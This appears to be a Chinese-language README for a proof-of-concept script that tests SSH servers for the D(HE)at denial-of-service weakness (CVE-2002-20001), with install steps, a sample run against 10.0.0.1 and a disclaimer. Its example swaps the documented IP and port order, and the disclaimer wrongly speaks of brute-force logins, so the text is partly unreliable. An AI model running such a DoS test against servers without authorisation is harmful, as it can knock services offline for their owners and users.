用于测试 SSH 服务中 D(HE)at DoS 攻击 (CVE-2002-20001) 是否存在的 POC
命令: python3 dheat_dos_attack_poc.py <IP_Address> <Port_Number>
<IP_Address>: 替换为你有权测试的 SSH 服务器的实际 IP 地址或主机名。
<Port_Number>: 运行 SSH 服务的目标端口号。
执行步骤: 在 Ubuntu、Kali 等系统上安装 Python 3 的基本命令如下:
$ sudo apt update
$ sudo apt install python3
下载并更改文件权限:
$ git clone https://github.com/itmaniac/dheat_dos_attack_poc.git
$ cd dheat_dos_attack_poc
$ chmod +x dheat_dos_attack_poc.py
D(HE)at DoS 攻击 POC 测试:
$ python3 dheat_dos_attack_poc.py 22 10.0.0.1
尝试建立 50 个连接到 10.0.0.1:22...
--- 测试结果 ---
目标: 10.0.0.1:22
总连接尝试次数: 50
成功连接次数: 50
失败连接次数: 0
总持续时间: 0.025 秒
连接速率: 1981.66 连接/秒
警告: 连接速率仍然较高 (大于 20.0 连接/秒)。可能易受 DHEat DoS 攻击。 提醒: 如果服务器设置了 'PerSourceMaxStartups 1',这可能是一个误报, 因为即使服务器能处理许多唯一连接,它也能防止单个来源的攻击。
本脚本仅供教育和合法渗透测试目的使用。作者不赞同或支持任何非法或未经授权使用此工具的行为。
使用条件:
您必须获得系统所有者的明确书面许可,方可测试任何 SSH 服务 仅用于您拥有或获得法律授权测试的系统 遵守所有适用的本地、国家和国际法律 未经适当授权,切勿在生产系统中使用此工具 使用的任何凭证必须是测试账户或虚拟凭证 使用本脚本即表示您同意:
您对自己的使用后果承担全部责任 作者不对滥用或损害承担任何责任 您不会将此工具用于任何恶意目的 此工具模拟暴力破解尝试,可能触发安全警报或账户锁定。请谨慎使用,并始终获得适当授权。
本 D(HE)at 拒绝服务 (DoS) 漏洞 (CVE-2002-20001) 的概念验证 (PoC) 脚本受 Szilárd Pfeiffer 的优秀研究启发。他关于此漏洞的详细工作可在以下网址找到:https://dheatattack.com/
虽然此脚本是用于教育和测试目的的独立实现,但它直接针对由他们为网络安全社区做出的宝贵贡献所识别和记录的攻击向量。